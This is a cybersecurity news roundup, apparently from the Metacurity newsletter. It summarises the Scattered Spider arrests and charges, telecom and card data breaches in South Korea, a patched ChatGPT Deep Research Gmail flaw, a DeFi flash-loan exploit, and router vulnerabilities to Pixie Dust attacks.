Two Scattered Spider members busted in the UK, one indicted in the US

Metacurity is a reader-supported publication that requires significant work and non-trivial expenses. We rely on the generous support of our paid readers. Please consider upgrading your subscription to support Metacurity's ongoing work. Thank you.

If you're unable to commit to a subscription today, please consider donating whatever you can. Thank you!

Two teenagers, 18-year-old Owen Flowers from Walsall and 19-year-old Thalha Jubair from East London, believed to be linked to the August 2024 cyberattack on Transport for London, and suspected members of the Scattered Spider threat group, have been arrested in the United Kingdom.

Flowers was previously arrested for his alleged involvement in the TfL attack in September 2024, but was released on bail after being questioned by officers of the UK National Crime Agency.

Since then, NCA investigators have found additional evidence potentially linking Flowers to attacks against US healthcare companies.

The two suspects are being prosecuted for computer misuse and fraud-related charges linked to an investigation into the breach of London's public transportation agency. Additionally, Flowers faces charges for conspiring to attack the networks of SSM Health Care Corporation and Sutter Health in the United States.

The US Department of Justice also charged Thalha Jubair with conspiracies to commit computer fraud, money laundering, and wire fraud, in relation to at least 120 network breaches and extortion attacks worldwide between May 2022 and September 2025, which affected at least 47 US organizations.

The complaint, filed in the District of New Jersey, alleges that victims have paid Jubair and his accomplices at least $115,000,000 in ransom payments.

The NCA arrested four other suspected members of the Scattered Spider cybercrime collective in July, believed to be involved in cyberattacks targeting major retailers in the country, including Marks & Spencer, Harrods, and Co-op. (Sergiu Gatlan / Bleeping Computer)

Related: NCA, Justice Department, Financial Times,  The Record, Ars Technica, BBC, The Register, The Verge, The Times, PCMag, Sky News, The Guardian, DeviceSecurity.io, TechCrunch, The Cyber Express, CyberScoop, Infosecurity, Hackread, TechRadar, Krebs on Security,  The Cyber Express, Cyber Kendra, Digit

The UK’s foreign intelligence service, MI6, launched a new online portal, which it says will allow potential spies in Russia and elsewhere to send the agency messages securely over the dark web.

Outgoing MI6 chief Richard Moore is using a speech today to announce the portal, called Silent Courier, the Foreign Office said in a statement. The agency will also post instructions on its official YouTube channel to help recruits pass on information about hostile intelligence activity or terrorism.

“Today, we’re asking those with sensitive information on global instability, international terrorism, or hostile state intelligence activity to contact MI6 securely online,” Moore will say in a speech in Istanbul, according to the statement. “Our virtual door is open to you.”

The advice to those wanting to spy for Britain includes downloading the TOR browser using a device not linked to them personally, as well as using a trustworthy virtual private network. (Alex Wickham / Bloomberg)

Related:  Al Jazeera, The i Paper, Reuters, CNN, Associated Press, The Sun, Irish News, Telegraph, Sky News, Kyiv Independent, The Register, Euronews, Firstpost, The Record

Korean telecom provider KT said it has reported a new case of suspected data breaches to authorities for investigation, in a case separate from its recent mobile payment violation.

South Korea's No. 2 mobile carrier said the report was submitted to the Korea Internet & Security Agency (KISA) just before midnight the previous day.

The mobile carrier said it had carried out an internal investigation for about four months and identified four cases with evidence of server breaches, along with two other suspected cases.

The report was submitted just hours after KT held a press briefing where the company raised the possible leakage of International Mobile Subscriber Identity (IMSI) and International Mobile Equipment Identity (IMEI) numbers, as well as phone numbers.

KT nevertheless claimed the universal subscriber identity module (USIM) certification number had not been compromised, although the latest server breach indicates the company cannot completely rule out the possibility. (Yohnap News Agency)

Related: Korea JoongAng Daily, BusinessKorea

South Korea’s Ministry of Science and ICT and the Financial Services Commission vowed a sweeping government response to a surge in high-profile cyberattacks that have rattled the nation’s telecommunications and financial sectors.

In a joint press briefing, Second Vice ICT Minister Ryu Je-myung stressed the gravity of the recent unauthorized micropayment scandal involving telecom giant KT Corp., pledging a rigorous probe and full disclosure of investigative findings.

“A joint public-private task force is urgently investigating how the attacker’s rogue micro base stations gained access to KT’s internal network and siphoned off personal data,” Ryu said.

The ministry confirmed that at least 362 individuals incurred damages totaling about 240 million won ($172,000), with up to 20,030 users exposed to unauthorized data harvesting. Compromised data includes mobile phone numbers, International Mobile Subscriber Identity (IMSI) numbers, and International Mobile Equipment Identity (IMEI) codes.

The vice minister also previewed major regulatory reforms: “Companies that intentionally delay or fail to report cyber intrusions will face significantly heavier penalties. The government will also be empowered to launch investigations based on circumstantial evidence, even in the absence of a formal corporate disclosure.”

In the same briefing, FSC Vice Chairman Kwon Dae-young revealed that a massive data breach at Lotte Card compromised the personal information of some 2.97 million customers. (Jie Ye-eun / Korea Herald)

Related: The Chosun Daily, Yonhap News Agency, The Investor

The US Immigration and Customs Enforcement (ICE) law enforcement arm, Homeland Security Investigations (HSI), has signed a contract worth $3 million with Magnet Forensics, a company that makes a phone-hacking and unlocking device called Graykey.

The contract, which appeared on Tuesday in a federal government procurement database, said it is for software licenses for the phone-hacking tech for HSI “to recover digital evidence, process multiple devices, & generate forensic reports essential to mission of protecting national security & public.”

While the contract doesn’t mention the name of the product, it’s likely referring to Graykey, a forensic system to unlock smartphones and extract data from them, which was initially developed by Grayshift. Magnet Forensics merged with Grayshift following an acquisition by private equity firm Thoma Bravo in 2023. (Lorenzo Franceschi-Bicchierai / TechCrunch)

Related: FPDS

Researchers at Radware report that OpenAI patched a ChatGPT security flaw that could have allowed hackers to extract Gmail data from its users.

The issue was found in ChatGPT’s Deep Research agent, a tool launched in February to help users analyze large troves of information. The vulnerability could have enabled attackers to siphon sensitive data from corporate or personal Gmail accounts, according to the findings. ChatGPT users who linked their Gmail accounts to the service may have unknowingly exposed their data to hackers, Radware researchers said.

The Deep Research tool from OpenAI is designed to conduct online research on users’ behalf more comprehensively and quickly answer complex questions. It can also connect to users’ Gmail accounts if they authorize it. Deep Research is available to ChatGPT users who pay an extra fee and marks an expansion of the company’s AI agents, or tools designed to carry out tasks with limited human intervention.

Radware uncovered the vulnerability, and researchers said there was no evidence that attackers had exploited it. OpenAI told Radware it fixed the flaw on September 3. (Margi Murphy / Bloomberg)

Related: Radware, Security Affairs, The Register, CSO Online, The Record, Ars Technica, Security Week

BNB Chain’s DeFi scene faced turbulence after attackers exploited the NGP protocol and siphoned off roughly $2 million in crypto, triggering a sharp token price drop and sending holders scrambling for information.

 Security teams flagged the transactions almost immediately, but the attacker still converted the funds to ETH.

The stolen assets were bridged to Ethereum, then routed through Tornado Cash. Investigations are ongoing, with security firms warning other DeFi teams to review similar vulnerabilities.

Attackers used a flash loan to distort the reserves in the Uniswap V2 pair.

By inflating the USDT side of the pool and reducing the token side, they temporarily made the token price appear much lower. This allowed them to bypass the maxBuyAmountInUsdt check built into the contract.

Once past the buy limit, the exploiter bought large volumes of NGP tokens before restoring the pool to normal levels.

After repaying the flash loan, the attacker pocketed the profit in a single transaction. This attack vector is common in protocols that rely on a single DEX spot price without an oracle safeguard. (Brenda Mary / Blockonomi)

Related: The Crypto Times, The Block, Coinspeaker

Researchers at NetRise report that many devices are still vulnerable to a Wi-Fi attack method disclosed more than a decade ago called Pixie Dust, which is related to Wi-Fi Protected Setup (WPS), and could be exploited to obtain a router’s WPS PIN and connect to the targeted wireless network without needing its password.

The Pixie Dust hack involves an attacker who is in range of the targeted Wi-Fi network, capturing the initial WPS handshake, which contains data that can then be cracked offline to obtain the WPS PIN. The attack leverages the fact that on some devices, random numbers are generated using predictable or low-entropy methods.

The attacker only needs seconds to capture the WPS handshake, and the PIN can then be obtained offline within minutes or even seconds.

NetRise has analyzed 24 networking device models used today to see if they are still vulnerable to Pixie Dust attacks. The devices came from six vendors, but TP-Link made half of them. 

NetRise’s analysis showed that of the 24 routers, access points, range extenders, and powerline/Wi-Fi hybrid systems, only four have been patched against Pixie Dust attacks, but in many cases, the fixes came after 9-10 years. Of the unpatched products, seven have reached end of life, but 13 are still supported.

In the tests conducted by the security firm, the WPS PIN was recovered in 1-2 seconds.

If twenty popular device models were found to be vulnerable to Pixie Dust attacks, that could translate to millions of affected devices. (Eduard Kovacs / Security Week)

Related: NetRise, SC Media, Help Net Security, Industrial Cyber

According to a court record, Dale Britt Bendler, a long-running CIA officer before retiring in 2014 and rejoining the agency as a contractor, who at the time of his employment dug through classified systems for information he then sold to a US lobbying firm and foreign clients, used access to those CIA systems as “his own personal Google."

“In total, between July 2017 and September 2020, Defendant earned approximately $360,000 in private client fees while also working as a full-time CIA contractor with daily access to highly classified material that he searched like it was his own personal Google,” a court document says. “He violated his oaths, broke the law, and should be held accountable.”

In his contractor role, Bendler had a Top Secret/Sensitive Compartmented Information security clearance, which granted access to some of the most sensitive information in the US government. In 2017, Bendler started working for a foreign national who was being investigated by his home country for allegedly embezzling money from the country’s sovereign wealth fund, according to the court record.

Bendler was paid $20,000 a month to help mount a public relations campaign that could rebut those embezzlement allegations and lobby government officials, it adds. The document says Bendler searched classified US government systems to see what information they contained about the foreign national.

In a second case, the foreign national had been accused of laundering money for a foreign terrorist organization. Bendler then searched CIA systems for information related to this person, according to the court record. (Joseph Cox / 404 Media)

Related: All-Source Intelligence

The Trump administration issued a lengthier denial of a whistleblower's allegation that DOGE officials at the Social Security Administration (SSA) copied the agency's database to an insecure cloud system.

The allegation centers on the Numerical Identification System (NUMIDENT) database containing Americans' personally identifiable information.

The cloud location described by the whistleblower report "is actually a secured server in the agency's cloud infrastructure, which historically has housed this data and is continuously monitored and overseen—SSA's standard practice," said a letter sent yesterday to Senate Finance Committee Chairman Mike Crapo (R-Idaho).

SSA Commissioner Frank Bisignano, a Trump appointee who was previously CEO of the financial technology company Fiserv, sent the letter. It came in response to Crapo's request for information.

"I can confirm, based on the agency's thorough review, that neither the Numident database nor any of its data has been accessed, leaked, hacked, or shared in any unauthorized fashion," Bisignano wrote. "SSA continuously monitors its systems for any signs of unauthorized access or data compromise, and we have not detected any such incidents involving the Numident database."

However, Bisignano's response ignores the whistleblower's primary complaint, which is that DOGE failed to obtain an authorization to operate as mandated under FISMA because, in fact, DOGE did not. That would have required several rigorous security steps and review by experts, a process that can take six months or more. (Jon Brodkin / Ars Technica)

Related: Fedscoop, Meritalk, Senate Finance Committee

Best Thing of the Day: Making Big Guys Pay

Aria Salvatrice, who claims she is a multimedia "autist" from France who is fighting against the "creepy uncle" surveillance problem of open source software, has launched what she calls the Forklift Certified License, version 0.69.420, which gives little guys the right to use the software, but big guys must pay.

Worst Thing of the Day: UK Workers Pay the Price for a Cyberattack

Around 230,000 workers remain out of work in the UK as the cyberattack on Jaguar Land Rover drags on far longer than expected.

Bonus Worst Thing of the Day: This Is One Way to Force Folks to Stay Away From the Fridge

A software update rolling out to Samsung’s Family Hub refrigerators in the US is putting ads on the fridges for the first time.

Closing Thought